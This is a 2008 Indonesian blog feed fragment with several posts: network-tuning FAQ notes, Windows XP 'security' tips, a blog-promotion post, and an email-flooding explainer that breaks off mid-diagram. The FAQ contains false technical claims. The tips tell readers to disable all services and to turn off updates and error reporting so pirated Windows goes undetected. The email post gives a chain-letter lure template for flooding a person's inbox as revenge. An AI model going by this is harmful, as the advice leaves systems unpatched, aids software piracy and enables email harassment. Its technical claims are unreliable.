Discovery&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Enabling this setting causes TCP to attempt to discover the Maximum Transmission Unit (MTU or largest packet size) over the path to a remote host. By discovering the Path MTU and limiting TCP segments to this size, TCP is supposed to be able to eliminate fragmentation at routers along the path that connect networks with different MTUs. This requires implementation of the corresponding server side algorithm, however, and presupposes all of the servers on the entire Internet only running MSFT server software with server-side optimization features accessible from MSFT web-browser client software. Needless to say, this is rather unlikely. Nevertheless, it is not recommended to disable this setting as it would then cause an MTU of 576 bytes to be used for all connections that are not to machines on the local subnet. Disabling this setting can cause severe performance degradation because fragmentation may not be compensated for. PMTU Auto Discovery is recommended to be enabled.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;a name="sack"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;Enable Selective Acknowledgements (SACK) &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;&lt;br /&gt;This parameter controls whether or not Selective Acknowledgment (SACK) support, as specified in RFC 2018, is enabled. Selective Acknowledgement (SACK) is an optimizing feature that lets you acknowledge receipt of individual blocks of data in a continuous sequence, rather than just the last sequence number. The recipient can tell the sender that one or more data blocks are missing from the middle of a sequence, and the sender can retransmit only the missing data.&lt;br /&gt;&lt;br /&gt;&lt;a name="maxdupack"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Max Duplicate ACKs&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This parameter determines the number of duplicate ACKs that must be received for the same sequence number of sent data before fast retransmit is triggered to resend the segment that has been dropped in transit.&lt;br /&gt;&lt;br /&gt;&lt;a name="tcpws"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;TCP Window Scaling (RFC 1323)&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Receive window scaling permits TCP to negotiate a scaling factor for the TCP receive window size, allowing the use of a very large TCP receive window size (RWIN). This option must be enabled in order to use a receive window size (RWIN) larger than 64 KB.&lt;br /&gt;&lt;br /&gt;&lt;a name="timestamps"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Timestamps (RFC 1323) &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Timestamps help TCP to measuring round trip time (RTT) accurately in order to adjust retransmission timeouts. The Timestamps option provides two four-byte timestamp fields in the TCP header, one to record the time the initial transmission is sent and one to record the time on the remote host. Since this option increases packed header overhead and don't provide much of an improvement, it is recommended to be disabled. This option is specified in RFC 1323.&lt;br /&gt;&lt;br /&gt;&lt;a name="ska"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Session Keep Alive&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value determines the time interval between keepalive transmissions on a session. Recommended value is 60000 ms (10 minutes).&lt;br /&gt;&lt;br /&gt;&lt;a name="MaxConectionsPerServer"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Internet Explorer: MaxConnectionsPerServer &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value limits the number of concurrent connections to a web server.&lt;br /&gt;&lt;br /&gt;&lt;a name="DisableUserTOSSetting"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Quality and Type Of Service : DisableUserTOSSetting&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This parameter can be used to allow programs to manipulate the Type Of Service (TOS) bits in the header of outgoing IP packets.&lt;br /&gt;&lt;br /&gt;&lt;a name="LANRequestBufferSize"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;LAN Settings : LAN Request Buffer Size&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This parameter can be used to reduce local area network delays.&lt;br /&gt;&lt;br /&gt;&lt;a name="IncreaseLANBrowsingSpeed"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;LAN Settings : Increase LAN Browsing Speed&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This option disables the network task scheduler leading to faster browsing of network folders.&lt;br /&gt;&lt;br /&gt;&lt;a name="HostResolutionPriority"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Host Resolution Priority&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This option group allows settings the priority level for LocalPriority (local names cache), HostsPriority (the hosts file), DnsPriority (DNS) and NetbtPriority (NetBT name resolution, WINS).&lt;br /&gt;&lt;br /&gt;&lt;a name="BcastNameQueryCount"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;NetBIOS over TCP/IP: BcastNameQueryCount &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value determines the number of times NetBT broadcasts a query for a particular name without receiving a response.&lt;br /&gt;&lt;br /&gt;&lt;a name="BcastQueryTimeout"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;NetBIOS over TCP/IP: BcastQueryTimeout&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value determines the time interval between successive broadcast name queries for the same name.&lt;br /&gt;&lt;br /&gt;&lt;a name="CacheTimeout"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;NetBIOS over TCP/IP: CacheTimeout&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value determines the time interval (in miliseconds) that names are cached for in the remote name table.&lt;br /&gt;&lt;br /&gt;&lt;a name="DNSCacheParameters"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;DNS Cache Parameters&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;MaxNegativeCacheTTL limits the negative DNS query answer cache time. NegativeSOACacheTime limits the negative answer to SOA DNS query cache time. NetFailureCacheTime value determines the time to stop sending DNS queries if no answer is received.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-4305897499541149229?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/4305897499541149229/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=4305897499541149229' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4305897499541149229'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4305897499541149229'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/faq-frequently-asked-questions-about.html' title='FAQ - Frequently asked questions about Network parameters optimized by SpeedConnec'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-1007674296620538799</id><published>2008-03-25T06:09:00.000-07:00</published><updated>2008-03-25T12:50:35.441-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Amankan windows</title><content type='html'>&lt;span style=""&gt;Dari hasil polling yang dilakukan oleh berbagai media cetak maupun elektronik, ternyata lebih dari 90% para pengguna komputer memilih Microsoft Windows untuk sistem operasinya. &lt;/span&gt;&lt;span style="" lang="DE"&gt;Hal ini terutama karena kemudahan penggunaan dan kaya fitur (menurut mereka sich..). Padahal kita tau sendiri banyaknya laporan kelemahan-kelemahan yang ada pada windows dan banyaknya serangan-serangan yang terjadi baik karena ulah Hacker, Virus, Trojan dan &lt;i&gt;saudara-saudara&lt;/i&gt;nya. Karena itulah pada artikel kali ini Spyro akan memberikan sedikit tips yang bisa anda kembangkan sendiri untuk mengamankan windows XP anda sehingga anda dapat &lt;i&gt;bermain&lt;/i&gt; dengan nyaman bersamanya.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;1.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;     &lt;b&gt;PARTISI NTFS &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Instal Windows XP anda pada partisi NTFS. Hal ini dibutuhkan bagi admin agar dapat memanfaatkan fasilitas File Permission untuk mengatur user dalam hal pembatasan hak akses. Lakukan konversi jika anda tidak menginstal windows XP anda pada partisi NTFS dengan cara: &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;1)     Masuklah ke command prompt (start-&gt; run -&gt; cmd.exe) &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;2)     Lalu ketiklah &lt;b&gt;convert c: /FT:NTFS /v&lt;/b&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;2.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;     &lt;b&gt;AKTIFKAN PASSWORD BIOS &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Sangat penting bagi anda untuk mengaktifkan password bios agar orang lain tidak seenaknya bisa memboot komputer anda. Hal ini juga penting jika anda menginstal Deepfreeze pada komputer anda karena orang lain bisa memanfaatkan bios untuk melakukan hacking deepfreeze (Baca artikel-artikel terdahulu tentang Hacking Deepfreeze). &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;3.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;MANFAATKAN SYSKEY &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Windows XP memiliki fasilitas pengaman yang akan meminta user untuk memasukkan password tatkala ia startup. Oh, apakah password bios saja tidak cukup? Jangan lupa, sekarang ini ada banyak cara bagi orang lain untuk bisa meng-hack password bios anda. &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Untuk mengatur agar komputer anda meminta password tatkala startup, anda dapat memanfaatkan SYSKEY: &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;1)     Masuklah ke dialog syskey dengan cara &lt;b&gt;start&lt;/b&gt; -&gt; &lt;b&gt;run&lt;/b&gt; lalu ketik syskey &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;2)     Klik &lt;b&gt;Update&lt;/b&gt; kemudian pilihlah &lt;b&gt;Password Startup&lt;/b&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;3)     &lt;/span&gt;&lt;span style="line-height: 200%;"&gt;Masukkan password anda disana. Dalam penulisan password, gunakan kata kunci yang sesulit mungkin namun mudah anda ingat. &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Jangan menggunakan hal-hal yang berhubungan dengan anda Sebagai password karena orang lain bisa saja menebak password anda dengan mudah. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;4.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;WELCOME SCREEN &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Pada welcome screen biasanya akan menampilkan daftar nama user pengguna komputer. Jangan memberikan hak seingkat admin pada siapapun kecuali anda! &lt;/span&gt;&lt;span style="line-height: 200%;"&gt;Ingat!! Trust Nobody! &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Pastikan juga username anda dalam keadaan terpassword. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;5.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;DISABLE SERVICES YANG TIDAK DIBUTUHKAN &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Diaktifkannya service-service default dapat membuka celah keamanan. Klik kanan pada &lt;b&gt;My Computer&lt;/b&gt; kemudian klik &lt;b&gt;Manage&lt;/b&gt; lalu masuklah ke &lt;b&gt;Services and Applications&lt;/b&gt; dan pilih &lt;b&gt;Services&lt;/b&gt;. Disable semua service yang ada di bagian ini. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;6.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;DISABLE ERROR REPORTING DAN AUTOMATIC UPDATES &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Windows XP memiliki fasilitas Error Reporting yang nantinya akan dikirim ke microsoft. &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Apabila anda memakai produk bajakan, pihak microsoft akan tau dan akan memutus service yang mereka berikan. &lt;/span&gt;&lt;span style="line-height: 200%;"&gt;Karena itu ada baiknya anda mendisable Error Reporting sehingga pihak microsoft tidak mengetahui bahwa windows anda bajakan. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Automatic Updates juga salah satu fasilitas yang akan langsung menghubungkan komputer kita dengan situs microsoft dan secara otomatis pihak microsoft akan tau apakah windows XP kita produk legal atau bajakan. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="line-height: 200%;"&gt;Untuk mendisable Error Reporting&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;: Masuklah ke &lt;b&gt;Control panel&lt;/b&gt; kemudian buka &lt;b&gt;Performance and Mainternance&lt;/b&gt; -&gt; &lt;b&gt;System&lt;/b&gt; -&gt; &lt;b&gt;advanced&lt;/b&gt; -&gt; &lt;b&gt;Error Reporting&lt;/b&gt; dan disable semuanya. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="line-height: 200%;"&gt;Untuk mendisable Automatic Updates&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;: Masuklah ke &lt;b&gt;Control panel&lt;/b&gt; kemudian buka &lt;b&gt;Performance and Mainternance&lt;/b&gt; -&gt; &lt;b&gt;System&lt;/b&gt; -&gt; &lt;b&gt;automatic updates &lt;/b&gt;dan disable updates. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Setelah anda melakukan keduanya, cobalah untuk melakukan langkah 5 untuk mendisable services &lt;b&gt;Error Reporting&lt;/b&gt; dan &lt;b&gt;Automatic updates&lt;/b&gt;. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;7.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;FIREWALL &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Port yang terbuka bisa dijadikan sebagai jalan masuk bagi &lt;i&gt;mahluk-mahluk maya&lt;/i&gt; yang tidak anda inginkan. &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Banyak sekali saya dengar suatu komputer dapat diterobos dengan mudah melalui port yang terbuka. "&lt;i&gt;Eh, khan udah jelas kalo serangan dilakukan melalui port yang terbuka, lalu kenapa gak ditutup ajah semua portnya?&lt;/i&gt;" Hehehe.. &lt;/span&gt;&lt;span style="line-height: 200%;"&gt;port itu ibarat pintu rumah. Kalo semua pintu rumah kita hilangkan dan semuanya ditembok, mungkin barang-barang di rumah anda akan aman dari pencuri, tapi bagaimana cara anda keluar rumah jika tidak ada pintu? Hal serupa juga terjadi pada komputer anda, mungkin anda akan aman dari serangan dari luar tapi anda tidak akan memiliki jalan untuk melakukan hubungan keluar. &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Solusinya? Aktifkan firewall anda untuk meremote port-port yang terbuka. Anda dapat menggunakan &lt;b&gt;Zone Alarm&lt;/b&gt; dan sejenisnya demi keamanan komputer anda. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;8.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;     &lt;b&gt;ANTIVIRUS &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Meskipun kita dapat menghindari Virus, Trojan dan Spyware dengan tangan kosong (baca tiips-trik aman dari virus tanpa antivirus di artikel terdahulu) namun demi kemudahan pekerjaan dan lebih terjaminnya keamanan kita perlu untuk menginstal antivirus. Jangan lupa untuk pandai-pandai memilih antivirus yang tepat dan rajin melakukan update virus definition terbaru. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;9.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;     &lt;b&gt;HAPUS FILE-FILE "SAMPAH" DAN JEJAK ANDA &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;span style="" lang="DE"&gt;Setiap anda beraktivitas entah itu browsing ke suatu situs atau membuka file, komputer selalu mencatat jejak anda, membuat suatu file temporary dan shortcut agar suatu ketika anda dapat membuka file itu atau situs tersebut dengan lebih cepat. Hal ini tentunya mengancam privasi anda bukan? &lt;/span&gt;&lt;span style=""&gt;Dan tentunya, file-file jejak yang menumpuk akan memakan freespace harddisk anda. Gunakan aplikasi penghapus jejak dan penghapus file-file sampah untuk mengatasi hal ini. Pilih-pilih sendiri aplikasinya di halaman Untility (pada halaman member www.spyrozone.tk).&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-1007674296620538799?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/1007674296620538799/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=1007674296620538799' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/1007674296620538799'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/1007674296620538799'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/amankan-windows.html' title='Amankan windows'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7528475467448809192</id><published>2008-03-25T03:29:00.000-07:00</published><updated>2008-03-25T05:47:34.150-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Blog'/><title type='text'>Berpromosi blog</title><content type='html'>Ini untuk para beginner didunia blog...........,,,,, setelah kamu membuat blog, ada baiknya untuk mempromosikan blog kamu. Hal ini bertujuan supaya blog kamu dapt banyak pengunjung,,,,, itu kan yang kita inginkan untuk blog kita,,,,,,,. Jadi tunggu apa lagi daftarin segera blog kamu untuk dapat dipromosiin. Nih.. ada beberapa buah link untuk berpromosi :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.kampungblog.com/"&gt;&lt;img src="http://www.kampungblog.com/button.php?u=denie" alt="KampungBlog.com - Kumpulan Blog-Blog Indonesia" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://technorati.com/claim/j9775fd9gc"&gt;Technorati.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-7528475467448809192?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://technorati.com/claim/j9775fd9gc' title='Berpromosi blog'/><link rel='enclosure' type='Blog' href='http://defidz.blogspot.com' length='0'/><link rel='enclosure' type='Blog' href='http://defidz.tblog.com' length='0'/><link rel='enclosure' type='Website' href='http://www.kampungblog.com/button.php?u=denie' length='0'/><link rel='enclosure' type='Website' href='http://www.no-minimum.com/pages/index.php?refid=piratesnofear' length='0'/><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7528475467448809192/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7528475467448809192' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7528475467448809192'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7528475467448809192'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/berpromosi-blog.html' title='Berpromosi blog'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-4381975835577750623</id><published>2008-03-24T21:42:00.000-07:00</published><updated>2008-03-25T06:00:16.347-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Email Technique</title><content type='html'>&lt;p class="MsoNormal"&gt;Saya (setelah sekian lama) baru menemukan konsep yang menarik setelah membaca ulang sebuah email yang dikirim ke saya. Isi email persisnya saya lupa, intinya saya mendapati email forward yang berisikan tawaran menarik apabila saya memforward lagi ke teman-teman dengan tetap menambahkan CC (carbon copy) ke email tertentu. &lt;/p&gt;  &lt;span style=";font-family:&amp;quot;;font-size:12;"  &gt;&lt;br /&gt;Dalam hal ini alamat email CC adalah si target flooding email. Dengan memakai metode ini kemungkinan email masuk kategori SPAM akan kecil, karena dikirim oleh alamat email yang valid (legit) dan tentu saja memenuhi inbox si target.&lt;br /&gt;Ya, ini adalah teknik yang digunakan oleh penyerang (A) untuk membanjiri INBOX targetnya (B).&lt;br /&gt;&lt;br /&gt;Kisah yang mungkin bisa ditelaah seperti berikut:&lt;br /&gt;A seorang Kepala divisi Marketing Perusahaan XYZ yang baru saja dipecat karena telah difitnah oleh B (boss dari A, koruptor sebenarnya) dengan tuduhan korupsi sebesar 2Milyar.&lt;br /&gt;Maka si A pun memutar otak bagaimana supaya bisa balas dendam terhadap B. Kesalahan dilakukan oleh manajemen Perusahaan XYZ (keberuntungan buat si A) karena tidak segera menghapus email account si A, maka dia pun pergi ke warnet dan login ke webmail Perusahaan XYZ dan memulai mengetikkan jari-jarinya ke keyboard.&lt;br /&gt;Singkat kata, A mengirim email ke 10 orang temannya yang isinya kurang lebih:&lt;br /&gt;&lt;br /&gt;Hello Teman,&lt;br /&gt;&lt;br /&gt;Saya adalah Kepala divisi Marketing Perusahaan XYZ.&lt;br /&gt;Dalam rangka perayaan ULTAH yang ke-10, Perusahaan kami sedang mengadakan sayembara berhadiah 1 mobil Ford Focus bagi siapa saja yang mengirimkan/memforward email ini ke teman yang lain dengan mengikutsertakan CC: ke email B. Ini kami perlukan untuk mendata siapa dan berapa jumlah forward yang telah dikirim. Bagi pengirim terbanyak akan segera mendapat email konfirmasi dari kami paling lambat 1 minggu setelah sayembara ini ditutup.&lt;br /&gt;&lt;br /&gt;...&lt;br /&gt;bla bla bla&lt;br /&gt;...&lt;br /&gt;~ditambah attachment sehingga email size: 100Kb&lt;br /&gt;&lt;br /&gt;Siapa yang tidak tertarik dengan iming-iming Ford Focus? Apalagi hanya butuh beberapa klik dan sentuhan keyboard. Hasilnya, 10 teman si A tadi segera memforward ke daftar kontak mereka. Paling sedikit masing-masing memforward ke 10 teman yang lain&lt;br /&gt;&lt;br /&gt;A --&gt; A'  --&gt; A'' --&gt; A'''--&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; 